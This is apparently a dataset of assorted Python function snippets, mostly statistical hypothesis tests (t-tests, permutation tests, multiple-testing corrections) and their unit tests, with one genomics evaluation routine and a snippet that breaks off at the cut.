self.assertFloatEqual(obs[:2], exp)\r\n self.assertFloatEqual(len(obs[2]), 999)\r\n self.assertIsProb(obs[3])", "def test_TLearner(self):\n # TLearner test\n # Instantiate TLearner\n Y, T, X, _ = ihdp_surface_B()\n est = AutomatedTLearner(models=automl_model_reg())\n\n # Test constant and heterogeneous treatment effect, single and multi output y\n\n est.fit(Y, T, X=X)\n _ = est.effect(X)", "def test_all_pairs_t_test_invalid_tests(self):\r\n exp = \"\"\"# The tests of significance were performed using a one-sided (high) Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean > Group 2 mean\r\n# The nonparametric p-values were calculated using 20 Monte Carlo permutations.\r\n# The nonparametric p-values contain the correct number of significant digits.\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. 
no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\tN/A\tN/A\tN/A\tN/A\tN/A\r\n\"\"\"\r\n obs = all_pairs_t_test(['foo', 'bar'], [[], [1, 2, 4]],\r\n 'high', 20)\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def test_on_posterior(test_data, test_label, posterior_samples):\n print(\"Testing on posterior samples...\")\n num_posterior_samples = posterior_samples.shape[0]\n avg_pred_test = np.zeros((num_posterior_samples, ))\n avg_pred_log_lld = np.zeros((num_posterior_samples, ))\n \n for k in range(num_posterior_samples):\n # Use the posterior samples\n w_sampled = posterior_samples[k]\n \n # Get the hessian\n #pred, dot_product = get_output(w_sampled, train_data)\n #hessian = get_hessian (phi= train_data, pred= pred[:, np.newaxis], t= train_label[:, np.newaxis], dot_product= dot_product)\n \n pred_test, _ = get_output (w_sampled, test_data)\n acc = get_accuracy(pred_test, test_label) \n pred_likelihood = get_prediction_likelihood_without_complications(test_data, test_label, w_sampled) #get_prediction_likelihood(test_data, test_label, w_sampled, hessian)\n avg_pred_test[k] = acc\n avg_pred_log_lld [k] = np.log(pred_likelihood)\n \n if (k+1)%100 == 0 or k== num_posterior_samples-1:\n print(\"{:5d} Posterior Weight samples Test_data Pred_acc= {:.2f}, Pred_log_likelihood= {:.2f}\".format(k+1, np.mean(avg_pred_test[:k]), np.mean(avg_pred_log_lld[:k])))", "def test_sample_perturb(self):\n self.data = pd.read_csv(pkg_resources.resource_filename(resource_package, 'tests/testing_data/test_sample_perturb.csv'),\n index_col=False)\n\n self.testpos = utils.sample_perturb(self.data, crime_type='Anti-social behaviour', pct_change=1.1)\n\n self.testneg = utils.sample_perturb(self.data, crime_type='Violence and sexual offences', pct_change=0.666)\n\n self.assertEqual(self.testpos.loc[0,'Counts'], 11)\n\n self.assertEqual(self.testneg.loc[4,'Counts'], 10)", "def compute_pvalue(self):\n # Run permutation test\n self.PermutationTest()\n # TS obtained from the original B,T samples\n self.compute_obs_TS()\n \n # Mean and std of the TS distribution\n self.mu = np.mean(self.TS_tilde)\n self.sigma = np.std(self.TS_tilde)\n \n # Standardized test statistic (zero mean, unit variance)\n self.TS_prime = (self.TS_tilde - self.mu)/self.sigma\n self.TS_prime_obs = (self.TS_obs - self.mu)/self.sigma\n \n # Two-sided p-value from TS' distribution\n self.p_value = 2*(1 - 0.01 * stats.percentileofscore(self.TS_prime,\n abs(self.TS_prime_obs)) )\n \n # if 0, compute it from standard normal\n if self.p_value == 0.0:\n self.p_value = self.pvalue_gaussian()\n \n print(\"\")\n print(\"p-value = {:e}\".format(self.p_value))", "def league_ttest(df_league_one: pd.DataFrame, df_league_two: pd.DataFrame, parameter: str, alpha: float, ):\n assert isinstance(df_league_one, pd.DataFrame), 'df_league_one needs to be a pandas dataframe.'\n assert isinstance(df_league_two, pd.DataFrame), 'df_league_two needs to be a pandas dataframe.'\n assert isinstance(alpha, float), 'alpha needs to be a float.'\n\n\n df_league_one_mean = df_league_one.mean()\n n = len(df_league_one['club'])\n df = n-1\n t_critical = stats.t.ppf(1-alpha, df)\n leagues_ttest = stats.ttest_1samp(a= df_league_two[f'{parameter}'], popmean= df_league_one_mean)\n t_value = leagues_ttest[0]\n p_value = leagues_ttest[1]\n\n stats_values = {}\n\n stats_values['p_value'] = 
round(list(p_value)[0], 4)\n\n if stats_values['p_value'] < alpha:\n return ('Enough evidence to reject null hypothesis')\n elif stats_values['p_value'] > alpha:\n return ('Not enough evidence to reject null hypothesis')", "def ttest_ind(self, alternative=\"two-sided\", usevar=\"pooled\", value=0):\n d1 = self.d1\n d2 = self.d2\n\n if usevar == \"pooled\":\n stdm = self.std_meandiff_pooledvar\n dof = d1.nobs - 1 + d2.nobs - 1\n elif usevar == \"unequal\":\n stdm = self.std_meandiff_separatevar\n dof = self.dof_satt()\n else:\n raise ValueError('usevar can only be \"pooled\" or \"unequal\"')\n\n tstat, pval = _tstat_generic(\n d1.mean, d2.mean, stdm, dof, alternative, diff=value\n )\n\n return tstat, pval, dof", "def calculate_t_test(mean1, mean2, var1, var2, n1, n2, alpha):\n # Two Sample T Test (M0 == M1) (Two Tails)\n t = (mean1 - mean2) / sqrt((var1 / n1) + (var2 / n2)) # t statistic calculation for two sample\n df = n1 + n2 - 2 # degree of freedom for two sample t - set\n pval = 1 - stats.t.sf(np.abs(t), df) * 2 # two-sided pvalue = Prob(abs(t)>tt) # p - value\n cv = stats.t.ppf(1 - (alpha / 2), df)\n standart_error = cv * sqrt((var1 / n1) + (var2 / n2))\n confidence_intervals = [abs(mean1 - mean2) - standart_error, abs(mean1 - mean2) + standart_error, standart_error]\n acception = 'HO REJECTED!' if pval < (alpha / 2) else 'HO ACCEPTED!' # left tail\n acception = 'HO REJECTED!' if pval > 1 - (alpha / 2) else 'HO ACCEPTED!' # right tail\n return pval, confidence_intervals, acception", "def test_repeated_two_tailed(self):\n rng = np.random.default_rng(6464584234)\n\n passed = 0\n n_iter = 500\n for _ in range(n_iter):\n data1 = rng.normal(10, 2, 100)\n data2 = data1 + rng.normal(0, .02, 100)\n\n ttest = repeated_ttest(data1, data2)\n\n if ttest['P_value'] < .05:\n passed +=1\n\n self.assertAlmostEqual(passed / n_iter, .05, delta=.01)", "def t_one_sample(a, popmean=0, tails=None):\r\n try:\r\n n = len(a)\r\n t = (mean(a) - popmean) / (std(a) / sqrt(n))\r\n except (ZeroDivisionError, ValueError, AttributeError, TypeError,\r\n FloatingPointError):\r\n return nan, nan\r\n if isnan(t) or isinf(t):\r\n return nan, nan\r\n\r\n prob = t_tailed_prob(t, n - 1, tails)\r\n return t, prob", "def test_t_paired_2tailed(self):\r\n x, y = self.x, self.y\r\n # check value of t and the probability for 2-tailed\r\n self.assertFloatEqual(t_paired(y, x)[0], 19.7203, 1e-4)\r\n self.assertFloatEqual(t_paired(y, x)[1], 1.301439e-11, 1e-4)", "def pval(self, distances, n_permutations=1000):\n if isinstance(distances, Variable):\n distances = distances.data\n return permutation_test_mat(distances.cpu().numpy(),\n self.n_1, self.n_2,\n n_permutations,\n a00=self.a00, a11=self.a11, a01=self.a01)", "def ks_permutation_var(stat, series1, series2):\n x1 = series1\n x2 = series2\n lx1 = len(x1)\n lx2 = len(x2)\n data_x = np.concatenate([x1, x2], axis=0)\n rng = np.random.default_rng(seed=42)\n ks_res = []\n n_samp = 1000\n for j in range(n_samp):\n x_con = rng.permutation(data_x)\n x1_perm = x_con[:lx1]\n x2_perm = x_con[lx2:]\n ks_res.append(stats.ks_2samp(x1_perm, x2_perm)[0])\n ks_list = np.sort(ks_res)\n ks_arg = np.arange(start=1, stop=n_samp+1)/n_samp\n p_val = 1-np.interp(stat, ks_list, ks_arg)\n return p_val", "def test_1_2(self):\r\n input = vector()\r\n p = imatrix()\r\n out = permute_row_elements(input, p)\r\n permute = function([input, p], out)\r\n\r\n rng = numpy.random.RandomState(utt.fetch_seed())\r\n input_val = rng.uniform(size=(5,)).astype(config.floatX)\r\n p_val = numpy.asarray([rng.permutation(5) for 
i in range(3)\r\n ], dtype='int32')\r\n out_val = permute(input_val, p_val)\r\n\r\n # Each row of p contains a permutation to apply to the input vector\r\n out_bis = numpy.asarray([input_val[p_row] for p_row in p_val])\r\n assert numpy.all(out_val == out_bis)\r\n\r\n # Verify gradient\r\n def permute_fixed(s_input):\r\n \"\"\"Auxiliary op defined to get rid of gradient wrt p_val\"\"\"\r\n return permute_row_elements(s_input, p_val)\r\n utt.verify_grad(permute_fixed, [input_val])", "def report_ttest_2sample(null_hypothesis, sample1, sample2, paired, alpha=0.05):\n\n if paired:\n t_value, p_value = stats.ttest_rel(sample1, sample2)\n else:\n t_value, p_value = stats.ttest_ind(sample1, sample2)\n print('Test for null hypothesis \"{}\".'.format(null_hypothesis))\n print('Sample 1 mean: {}, Sample 1 SD: {}'.format(np.mean(sample1), np.std(sample1)))\n print('Sample 2 mean: {}, Sample 2 SD: {}'.format(np.mean(sample2), np.std(sample2)))\n print('t({})={}, p={}.'.format(len(sample1)-1, t_value, p_value))\n if p_value < alpha:\n print('Reject null hypothesis.\\n')\n else:\n print('Fail to reject null hypothesis.\\n')", "def lttest_rel (a,b,printit=0,name1='Sample1',name2='Sample2',writemode='a'):\r\n if len(a)<>len(b):\r\n raise ValueError, 'Unequal length lists in ttest_rel.'\r\n x1 = mean(a)\r\n x2 = mean(b)\r\n v1 = var(a)\r\n v2 = var(b)\r\n n = len(a)\r\n cov = 0\r\n for i in range(len(a)):\r\n cov = cov + (a[i]-x1) * (b[i]-x2)\r\n df = n-1\r\n cov = cov / float(df)\r\n sd = math.sqrt((v1+v2 - 2.0*cov)/float(n))\r\n t = (x1-x2)/sd\r\n prob = betai(0.5*df,0.5,df/(df+t*t))\r\n\r\n if printit <> 0:\r\n statname = 'Related samples T-test.'\r\n outputpairedstats(printit,writemode,\r\n name1,n,x1,v1,min(a),max(a),\r\n name2,n,x2,v2,min(b),max(b),\r\n statname,t,prob)\r\n return t, prob", "def distribute_individual_permutation_tests(\r\n matrix: csr_matrix,\r\n seeds: List[types.BioEntity],\r\n uids: Dict[types.BioEntity, int],\r\n output: str,\r\n permutations: int = 250,\r\n alpha: np.double = 0.15,\r\n procs: int = os.cpu_count(),\r\n single: bool = False,\r\n fdr: bool = False\r\n) -> None:\r\n\r\n client = get_client()\r\n\r\n log._logger.info('Scattering data to workers...')\r\n\r\n ## Scatter data onto workers\r\n [matrix] = client.scatter([matrix], broadcast=True)\r\n [uids] = client.scatter([uids], broadcast=True)\r\n futures = []\r\n\r\n if single:\r\n seeds = [seeds] # type: ignore\r\n\r\n for s in seeds:\r\n\r\n log._logger.info('Running permutation tests...')\r\n\r\n permuted_futures = []\r\n s = client.scatter([s], broadcast=True)\r\n\r\n ## Split the number of permutations evenly\r\n for chunk in np.array_split(np.zeros(permutations), procs):\r\n\r\n prox_vector_future = client.submit(\r\n _run_individual_permutation_tests,\r\n matrix,\r\n s,\r\n uids,\r\n len(chunk),\r\n alpha,\r\n pure=False,\r\n single=single\r\n )\r\n\r\n permuted_futures.append(prox_vector_future)\r\n\r\n futures.append(permuted_futures)\r\n\r\n log._logger.info('Calculating p-values...')\r\n\r\n ## Wait for testing to finish\r\n for i, test in enumerate(futures):\r\n\r\n ## Gather the results of the permutation tests for this specific seed node\r\n test = client.gather(test)\r\n ## Get the first test so we keep the node_from, node_to, and prob. columns and\r\n ## concat the walk scores from the rest.\r\n prox_vector = test.pop(0)\r\n\r\n ## Get rid of node_from, node_to, prob. 
columns from the rest of the tests and\r\n ## only keep their permuted walk scores\r\n for df in test:\r\n prox_vector = pd.concat([\r\n prox_vector,\r\n df.drop(columns=['node_from', 'node_to', 'probability'])\r\n ], axis=1)\r\n\r\n ## Calculate the p-value\r\n prox_vector = _calculate_p(prox_vector, permutations)\r\n\r\n ## FDR adjusted p-values\r\n if fdr:\r\n prox_vector = _adjust_fdr(prox_vector)\r\n\r\n ## Create a new file if necessary\r\n if i == 0:\r\n _make_ness_header_output(output, p=True, q=fdr)\r\n\r\n ## Save the output\r\n _append_ness_output(output, prox_vector)", "def get_stat_dif(column, target_column, data, alpha):\n cols = data.loc[:, column].value_counts().index[:]\n combinations_all = list(combinations(cols, 2))\n for comb in combinations_all:\n a = data.loc[data.loc[:, column] == comb[0], target_column]\n b = data.loc[data.loc[:, column] == comb[1], target_column]\n result = ttest_ind(a, b).pvalue\n\n if result <= alpha/len(combinations_all):\n print('Найдены статистически значимые различия для колонки', column)\n break", "def correlation_test(x_items, y_items, method='pearson', tails=None,\r\n permutations=999, confidence_level=0.95):\r\n # Perform some initial error checking.\r\n if method == 'pearson':\r\n corr_fn = pearson\r\n elif method == 'spearman':\r\n corr_fn = spearman\r\n else:\r\n raise ValueError(\"Invalid method '%s'. Must be either 'pearson' or \"\r\n \"'spearman'.\" % method)\r\n if tails is not None and tails != 'high' and tails != 'low':\r\n raise ValueError(\"Invalid tail type '%s'. Must be either None, \"\r\n \"'high', or 'low'.\" % tails)\r\n if permutations < 0:\r\n raise ValueError(\"Invalid number of permutations: %d. Must be greater \"\r\n \"than or equal to zero.\" % permutations)\r\n if confidence_level <= 0 or confidence_level >= 1:\r\n raise ValueError(\"Invalid confidence level: %.4f. Must be between \"\r\n \"zero and one.\" % confidence_level)\r\n\r\n # Calculate the correlation coefficient.\r\n corr_coeff = corr_fn(x_items, y_items)\r\n\r\n # Perform the parametric test first.\r\n x_items, y_items = array(x_items), array(y_items)\r\n n = len(x_items)\r\n df = n - 2\r\n if n < 3:\r\n parametric_p_val = 1\r\n else:\r\n try:\r\n t = corr_coeff / sqrt((1 - (corr_coeff * corr_coeff)) / df)\r\n parametric_p_val = t_tailed_prob(t, df, tails)\r\n except (ZeroDivisionError, FloatingPointError):\r\n # r/rho was presumably 1.\r\n parametric_p_val = 0\r\n\r\n # Perform the nonparametric test.\r\n permuted_corr_coeffs = []\r\n nonparametric_p_val = None\r\n better = 0\r\n for i in range(permutations):\r\n permuted_y_items = y_items[permutation(n)]\r\n permuted_corr_coeff = corr_fn(x_items, permuted_y_items)\r\n permuted_corr_coeffs.append(permuted_corr_coeff)\r\n\r\n if tails is None:\r\n if abs(permuted_corr_coeff) >= abs(corr_coeff):\r\n better += 1\r\n elif tails == 'high':\r\n if permuted_corr_coeff >= corr_coeff:\r\n better += 1\r\n elif tails == 'low':\r\n if permuted_corr_coeff <= corr_coeff:\r\n better += 1\r\n else:\r\n # Not strictly necessary since this was checked above, but included\r\n # for safety in case the above check gets removed or messed up. We\r\n # don't want to return a p-value of 0 if someone passes in a bogus\r\n # tail type somehow.\r\n raise ValueError(\"Invalid tail type '%s'. 
Must be either None, \"\r\n \"'high', or 'low'.\" % tails)\r\n if permutations > 0:\r\n nonparametric_p_val = (better + 1) / (permutations + 1)\r\n\r\n # Compute the confidence interval for corr_coeff using Fisher's Z\r\n # transform.\r\n z_crit = abs(ndtri((1 - confidence_level) / 2))\r\n ci_low, ci_high = None, None\r\n\r\n if n > 3:\r\n try:\r\n ci_low = tanh(arctanh(corr_coeff) - (z_crit / sqrt(n - 3)))\r\n ci_high = tanh(arctanh(corr_coeff) + (z_crit / sqrt(n - 3)))\r\n except (ZeroDivisionError, FloatingPointError):\r\n # r/rho was presumably 1 or -1. Match what R does in this case.\r\n ci_low, ci_high = corr_coeff, corr_coeff\r\n\r\n return (corr_coeff, parametric_p_val, permuted_corr_coeffs,\r\n nonparametric_p_val, (ci_low, ci_high))", "def correct_pvalues_for_multiple_testing(pvalues, correction_type=\"Benjamini-Hochberg\"):\r\n from numpy import array, empty\r\n pvalues = array(pvalues)\r\n n = float(pvalues.shape[0])\r\n new_pvalues = empty(n)\r\n if correction_type == \"Bonferroni\":\r\n new_pvalues = n * pvalues\r\n elif correction_type == \"Bonferroni-Holm\":\r\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\r\n values.sort()\r\n for rank, vals in enumerate(values):\r\n pvalue, i = vals\r\n new_pvalues[i] = (n - rank) * pvalue\r\n elif correction_type == \"Benjamini-Hochberg\":\r\n values = [(pvalue, i) for i, pvalue in enumerate(pvalues)]\r\n values.sort()\r\n values.reverse()\r\n new_values = []\r\n for i, vals in enumerate(values):\r\n rank = n - i\r\n pvalue, index = vals\r\n new_values.append((n / rank) * pvalue)\r\n for i in range(0, int(n) - 1):\r\n if new_values[i] < new_values[i + 1]:\r\n new_values[i + 1] = new_values[i]\r\n for i, vals in enumerate(values):\r\n pvalue, index = vals\r\n new_pvalues[index] = new_values[i]\r\n return new_pvalues", "def test_auto_cohorting_randomization(self):\r\n course = modulestore().get_course(self.toy_course_key)\r\n self.assertFalse(course.is_cohorted)\r\n\r\n groups = [\"group_{0}\".format(n) for n in range(5)]\r\n self.config_course_cohorts(course, [], cohorted=True,\r\n auto_cohort=True,\r\n auto_cohort_groups=groups)\r\n\r\n # Assign 100 users to cohorts\r\n for i in range(100):\r\n user = User.objects.create(username=\"test_{0}\".format(i),\r\n email=\"a@b{0}.com\".format(i))\r\n get_cohort(user, course.id)\r\n\r\n # Now make sure that the assignment was at least vaguely random:\r\n # each cohort should have at least 1, and fewer than 50 students.\r\n # (with 5 groups, probability of 0 users in any group is about\r\n # .8**100= 2.0e-10)\r\n for cohort_name in groups:\r\n cohort = get_cohort_by_name(course.id, cohort_name)\r\n num_users = cohort.users.count()\r\n self.assertGreater(num_users, 1)\r\n self.assertLess(num_users, 50)", "def test_tpr_fwer(self, syn_genomic_data, syn_labels, syn_labels_0based, syn_labels_cat, syn_fm, syn_idx, rep, syn_true_pvalues):\n\n window_lengths = [35]\n\n best_params_montaez = {'epochs': 500, 'l1_reg': 0.001, 'l2_reg': 0.0001,'lr' :1e-05, 'dropout_rate':0.3, 'hidden_neurons':64, 'n_snps': n_total_snps}\n\n # n_permutations = 2\n\n def combi_compute_pvalues(d, x, fm, l,filter_window_size,pf,ps,k):\n #clf, syn_genomic_data[str(i)][:], fm_2d[str(i)][:], syn_labels[str(i)], 35, 2, 2, 30\n idx, pvalues, _ = combi_method(d, x,fm, l,filter_window_size,pf,ps,k)\n\t\t\t#combi_method(classifier,data, fm, labels, filter_window_size, pnorm_filter, psvm, top_k)\n pvalues_filled = np.ones(n_total_snps)\n pvalues_filled[idx] = pvalues\n del d, l\n return pvalues_filled\n\n def 
challenger_compute_pvalues(d, x, l_0b, l, idx):\n is_only_zeros = False\n with tensorflow.Session().as_default():\n\n model = create_montaez_dense_model(best_params_montaez)\n\n model.fit(x=x[idx.train], y=l_0b[idx.train],\n validation_data=(x[idx.test], l_0b[idx.test]),\n epochs=best_params_montaez['epochs'],\n callbacks=[\n ReduceLROnPlateau(monitor='val_loss',\n mode='min'),\n ])\n\n model = iutils.keras.graph.model_wo_softmax(model)\n analyzer = innvestigate.analyzer.LRPAlpha2Beta1(model)\n weights = analyzer.analyze(x).sum(0)\n\n if np.max(abs(weights)) < 0.005:\n fig, axes = plt.subplots(1)\n is_only_zeros = True\n axes.plot(np.absolute(weights).sum(axis=1))\n fig.savefig(os.path.join(IMG_DIR, 'test.png'))\n\n pvalues_list = np.zeros((len(window_lengths), weights.shape[0]))\n for i, filter_size in enumerate(window_lengths):\n top_indices_sorted, _ = postprocess_weights(\n weights, top_k, filter_size, p_svm, p_pnorm_filter)\n pvalues = chi_square(d[:, top_indices_sorted], l)\n pvalues_filled = np.ones(n_total_snps)\n pvalues_filled[top_indices_sorted] = pvalues\n pvalues_list[i] = pvalues_filled\n del d, x, l\n\n return pvalues_list, is_only_zeros\n\n fm_2d = syn_fm(\"2d\")\n fm_3d = syn_fm(\"3d\")\n clf = LinearSVC(penalty='l2', loss='hinge', C=1.0000e-05, dual=True, tol=1e-3, verbose=0)\n\n pvalues_per_run_combi = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(\n combi_compute_pvalues)(clf, syn_genomic_data[str(i)][:], fm_2d[str(i)][:], syn_labels[str(i)], 35, 2, 2, 30) for i in tqdm(range(rep))))\n\n pvalues_per_run_rpvt = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(\n chi_square)(syn_genomic_data[str(i)][:], syn_labels[str(i)]) for i in tqdm(range(rep))))\n\n # len(thresholds) * len(window_sizes) * 10020\n a = Parallel(n_jobs=-1, require='sharedmem')(delayed(\n challenger_compute_pvalues)(syn_genomic_data[str(i)][:], fm_3d[str(i)][:], syn_labels_cat[str(i)], syn_labels[str(i)], syn_idx[str(i)]) for i in tqdm(range(rep)))\n\n # INNvestigate bugfix\n zeros_index = np.array(list(np.array(a)[:, 1]))\n pvalues_per_run_dense = np.array(list(np.array(a)[:, 0]))\n\n pvalues_per_run_combi = pvalues_per_run_combi[np.logical_not(zeros_index)]\n pvalues_per_run_dense = pvalues_per_run_dense[np.logical_not(zeros_index)]\n pvalues_per_run_rpvt = pvalues_per_run_rpvt[np.logical_not(zeros_index)]\n true_pvalues = syn_true_pvalues[np.logical_not(zeros_index)]\n\n # COMBI\n res_combi = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(compute_metrics)(pvalues_per_run_combi, true_pvalues, threshold) for threshold in tqdm(thresholds)))\n tpr_combi, _, fwer_combi, precision_combi = res_combi.T\n\n\n # T_star - WARNING TAKES FOREVER\n tpr_permuted = 0\n fwer_permuted = 0\n precision_permuted = 0\n\n \"\"\"\n for i in range(rep):\n with tensorflow.Session().as_default():\n\n model = create_montaez_dense_model_2(best_params_montaez_2)\n t_star = permuted_deepcombi_method(model, h5py_data[str(i)][:], fm_3d[str(i)][:], labels[str(i)], labels_cat[str(i)], n_permutations, alpha_sig_toy, filter_window_size, top_k, mode='all' )\n ground_truth = np.zeros((1,n_total_snps),dtype=bool)\n ground_truth[:,5000:5020] = True\n tpr, _, fwer, precision = compute_metrics(pvalues_per_run_rpvt[i], ground_truth, t_star) \n tpr_permuted += tpr\n fwer_permuted += fwer\n precision_permuted += precision\n tpr_permuted/=rep\n fwer_permuted/=rep\n precision_permuted/=rep\n \"\"\"\n\n # RPVT\n\n res_rpvt = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(compute_metrics)(\n 
pvalues_per_run_rpvt, true_pvalues, threshold) for threshold in tqdm(thresholds)))\n\n tpr_rpvt, _, fwer_rpvt, precision_rpvt = res_rpvt.T\n\n # Plot\n fig, axes = plt.subplots(2)\n fig.set_size_inches(18.5, 10.5)\n ax1, ax2 = axes\n\n ax1.set_ylim(0, 0.45)\n ax1.set_xlim(0, 0.1)\n\n ax1.set_ylabel('TPR')\n ax1.set_xlabel('FWER')\n ax1.plot(fwer_combi, tpr_combi, '-o',\n label='Combi')\n ax1.plot(fwer_rpvt, tpr_rpvt, '-o',\n label='RPVT')\n #ax1.plot(fwer_permuted, tpr_permuted, '-x',\n # label='COMBI & permuted threshold - ttbr={}'.format(ttbr))\n\n ax2.set_ylabel('Precision')\n ax2.set_xlabel('TPR')\n ax2.plot(tpr_combi, precision_combi, '-o',\n label='Combi')\n ax2.plot(tpr_rpvt, precision_rpvt, '-o',\n label='RPVT')\n #ax2.plot(tpr_permuted, precision_permuted, '-x',\n # label='COMBI & permuted threshold - ttbr={}'.format(ttbr))\n\n # Save results\n np.save(os.path.join(NUMPY_ARRAYS, 'combi-tpr-{}'.format(ttbr)), tpr_combi)\n np.save(os.path.join(NUMPY_ARRAYS, 'combi-fwer-{}'.format(ttbr)), fwer_combi)\n np.save(os.path.join(NUMPY_ARRAYS, 'combi-precision-{}'.format(ttbr)), precision_combi)\n np.save(os.path.join(NUMPY_ARRAYS, 'permuted-avg-tpr-pt{}'.format(ttbr)), tpr_permuted)\n np.save(os.path.join(NUMPY_ARRAYS, 'permuted-avg-fwer-pt{}'.format(ttbr)), fwer_permuted)\n np.save(os.path.join(NUMPY_ARRAYS, 'permuted-avg-precision-pt{}'.format(ttbr)), precision_permuted)\n\n np.save(os.path.join(NUMPY_ARRAYS, 'rpvt-tpr-{}'.format(ttbr)), tpr_rpvt)\n np.save(os.path.join(NUMPY_ARRAYS, 'rpvt-fwer-{}'.format(ttbr)), fwer_rpvt)\n np.save(os.path.join(NUMPY_ARRAYS, 'rpvt-precision-{}'.format(ttbr)), precision_rpvt)\n\n # CHALLENGER\n for i, window in enumerate(window_lengths):\n pvalues_challenger = pvalues_per_run_dense[:, i]\n\n res_dense = np.array(Parallel(n_jobs=-1, require='sharedmem')(delayed(compute_metrics)(\n pvalues_challenger, true_pvalues, threshold) for threshold in tqdm(thresholds)))\n\n tpr_dense, _, fwer_dense, precision_dense = res_dense.T\n np.save(os.path.join(NUMPY_ARRAYS, 'tpr-{}-{}'.format(window, ttbr)), tpr_dense)\n np.save(os.path.join(NUMPY_ARRAYS, 'fwer-{}-{}'.format(window, ttbr)), fwer_dense)\n np.save(os.path.join(NUMPY_ARRAYS, 'precision-{}-{}'.format(window, ttbr)), precision_dense)\n assert fwer_combi.max() <= 1 and fwer_combi.min() >= 0\n ax1.plot(fwer_dense, tpr_dense, '-x', label='DeepCOMBI')\n ax2.plot(tpr_dense, precision_dense, '-x', label='DeepCOMBI')\n\n ax1.legend()\n ax2.legend()\n fig.savefig(\n os.path.join(IMG_DIR, 'tpr_fwer_montaez_combi_newsettings.png'.format(zeros_index.sum())),\n dpi=300)", "def make_nonparametric_ab_test(dataframe, iteration_column,\n target_column, not_normal_ids_list):\n rejected_pairs = []\n not_rejected_pairs = []\n category_list = list(itertools.combinations(not_normal_ids_list, 2))\n for i in category_list:\n ttest, p_value = mannwhitneyu(dataframe.\n loc[dataframe[iteration_column] == i[0],\n target_column],\n dataframe.\n loc[dataframe[iteration_column] == i[1],\n target_column])\n if p_value >= 0.05:\n not_rejected_pairs.append(i)\n else:\n rejected_pairs.append(i)\n return rejected_pairs, not_rejected_pairs", "def z_t_test_single_sample(p_sample_mean, p_hypothesized_mean, p_provided_std, p_sample_size):\n\n # -- -------------------------------------------\n sem = p_provided_std / np.sqrt(p_sample_size)\n\n z_t_stat = (p_sample_mean - p_hypothesized_mean) / sem\n # -- -------------------------------------------\n\n # -- -------------------------------------------\n Result = namedtuple('Result', 'z_t_stat sem')\n\n 
result = Result(\n z_t_stat,\n sem\n )\n\n return result\n # -- -------------------------------------------", "def _infer_pvalues(self, effect, perm, p=.05, mcp='maxstat'):\n assert all([isinstance(k, np.ndarray) for k in (effect, perm)])\n n_perm = perm.shape[0]\n # compute the minimum number of required permutations\n n_perm_req = int(10. / p)\n if n_perm < n_perm_req:\n logger.warning(f\"For inferences at p<{p}, it is recommended to per\"\n f\"form at least n_perm={n_perm_req} permutations\")\n\n # ---------------------------------------------------------------------\n logger.info(f\" infer p-values at (p={p}, mcp={mcp})\")\n # computes the pvalues\n if mcp is 'maxstat':\n max_p = perm.reshape(n_perm, -1).max(1)[np.newaxis, ...]\n nb_over = (effect[..., np.newaxis] <= max_p).sum(-1)\n pvalues = nb_over / n_perm\n # non-signi. p-values are set to 1. and min(pvalues) = 1 / n_perm\n pvalues[pvalues >= p] = 1.\n pvalues = np.maximum(1. / n_perm, pvalues)\n elif mcp in ['fdr', 'bonferroni']:\n from mne.stats import fdr_correction, bonferroni_correction\n fcn = fdr_correction if mcp is 'fdr' else bonferroni_correction\n # compute the p-values\n pvalues = (effect[np.newaxis, ...] <= perm).sum(0) / n_perm\n pvalues = np.maximum(1. / n_perm, pvalues)\n # apply correction\n is_signi, pvalues = fcn(pvalues, alpha=p)\n pvalues[~is_signi] = 1.\n\n return pvalues", "def par_test_14(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.TKW_par_factor.setMaxDepth(i)\n\n res = self.XYZ_factor.mult(self.TKW_factor)\n par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values", "def test_distance_matrix_permutation_test_symmetric(self):\r\n def make_result_list(*args, **kwargs):\r\n return (\r\n [distance_matrix_permutation_test(*args)[2] for i in range(10)]\r\n )\r\n\r\n m = array([[0, 1, 3], [1, 2, 4], [3, 4, 5]])\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n n = 100\r\n\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n, tails='high')\r\n self.assertSimilarMeans(r, 0.77281447417149496, 0)\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n, tails='low')\r\n self.assertSimilarMeans(r, 4. 
/ 6.)\r\n\r\n # The following lines are not part of the test code, but are useful in\r\n # figuring out what t-scores all of the permutations will yield.\r\n # permutes = [[0, 1, 2], [0, 2, 1], [1, 0, 2],\\\r\n # [1, 2, 0], [2, 0, 1], [2, 1, 0]]\r\n #results = []\r\n # for p in permutes:\r\n # p_m = permute_2d(m,p)\r\n # results.append(t_two_sample(\\\r\n # [p_m[0,1],p_m[0,2]],[p_m[2,1]],tails='high'))\r\n # print results\r", "def test_one_sample_right_tailed(self):\n rng = np.random.default_rng(615419864354)\n\n passed = 0\n n_iter = 500\n for _ in range(n_iter):\n data1 = rng.normal(12.2, 1, 100)\n\n ttest = one_sample_ttest(data1, 12.2, 'right')\n\n if ttest['P_value'] < .05:\n passed +=1\n\n self.assertAlmostEqual(passed / n_iter, .05, delta=.01)", "def create_panel_of_normals_advanced(tsca_id, all_samples, num_normals_per_cohort_involved = 3, batches_to_pick_from = []):\n # Get all samples\n batch_samples = all_samples[all_samples['tsca_id']==tsca_id]\n # Batch normals \n batch_normals = batch_samples[batch_samples['sample_type']==\"Normal\"]\n # Number of normals in batch\n num_normals_from_batch = batch_normals.shape[0]\n # Cohorts of samples in batch\n cohorts_involved = batch_samples['cohort_code'].unique()\n\n # Only select normals from the restricted 